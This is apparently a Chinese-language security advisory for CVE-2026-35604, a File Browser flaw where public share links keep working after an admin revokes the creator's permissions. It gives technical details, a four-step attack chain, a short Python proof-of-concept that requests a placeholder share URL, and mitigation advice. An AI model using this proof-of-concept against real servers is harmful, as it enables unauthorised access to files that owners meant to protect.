CVE-2026-35604 CVSS 8.1 高危

CVE-2026-35604 File Browser权限绕过漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35604

漏洞类型

权限绕过

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

File Browser

漏洞概述

File Browser是一款功能强大的文件管理Web界面软件。在2.63.1版本之前，该软件存在一个严重的权限绕过漏洞。具体表现为：当管理员撤销了某个用户的“共享”与“下载”权限后，该用户此前生成的公开共享链接并不会失效，仍可被未认证的匿名用户直接访问。这是因为系统的公共共享下载处理程序在处理请求时，未重新校验共享创建者当前的权限状态。攻击者可利用此漏洞绕过权限管理，持续访问本应受保护的敏感文件资源。

技术细节

该漏洞的核心原理在于File Browser对共享链接的权限验证逻辑存在设计缺陷。在正常的权限管理模型中，资源的访问权限应与用户当前的实时权限状态绑定。然而，在受影响的File Browser版本中，当生成一个公开共享链接时，系统生成了一个静态的访问令牌。在后续的下载请求处理中，服务器端仅验证了该令牌的格式正确性及其是否存在，却忽略了验证令牌持有者（即共享创建者）当前是否仍拥有共享和下载文件的权限。

利用方式非常简单且隐蔽。攻击者只需在权限被撤销前（或通过其他方式获取到）获得一个有效的共享链接URL。当管理员撤销了原创建者的权限后，攻击者依然可以直接向服务器发送针对该URL的GET请求。由于服务器未执行动态的权限回溯检查，请求会被合法处理，导致攻击者能够绕过管理员设定的访问控制策略，成功下载或预览文件。这属于典型的业务逻辑缺陷，严重影响了系统的机密性。

攻击链分析

STEP 1

步骤1

普通用户在File Browser中创建文件共享链接，并获取公开访问URL。

STEP 2

步骤2

管理员出于安全考虑，撤销了该用户的共享和下载权限。

STEP 3

步骤3

攻击者（或未授权用户）获取到在步骤1中生成的旧共享链接。

STEP 4

步骤4

攻击者直接访问该链接，由于服务端未校验当前权限，成功下载文件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-35604: File Browser Permission Bypass
# This script demonstrates that existing share links remain accessible
# even after the share owner's permissions have been revoked.

target_url = "http://example-file-browser.com/public/shares/vulnerable_share_id"

def exploit_cve_2026_35604(url):
    print(f"[*] Attempting to access share link: {url}")
    
    try:
        # Send a GET request to the public share link
        response = requests.get(url, timeout=10)
        
        # Check if the file is accessible (HTTP 200)
        if response.status_code == 200:
            print("[+] Vulnerability Confirmed!")
            print("[+] File is still accessible despite permission revocation.")
            print(f"[+] Response Content-Type: {response.headers.get('Content-Type')}")
        elif response.status_code == 403 or response.status_code == 404:
            print("[-] Access denied or link not found. System may be patched.")
        else:
            print(f"[?] Unexpected status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    exploit_cve_2026_35604(target_url)

影响范围

File Browser < 2.63.1

防御指南

临时缓解措施

如果无法立即升级，建议管理员暂时禁用公共共享功能。此外，应检查系统日志，识别所有当前活跃的共享链接，并手动删除它们，以确保在权限撤销后资源不会被未授权访问。同时，严格限制用户权限，仅对受信任的用户开放文件共享能力。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表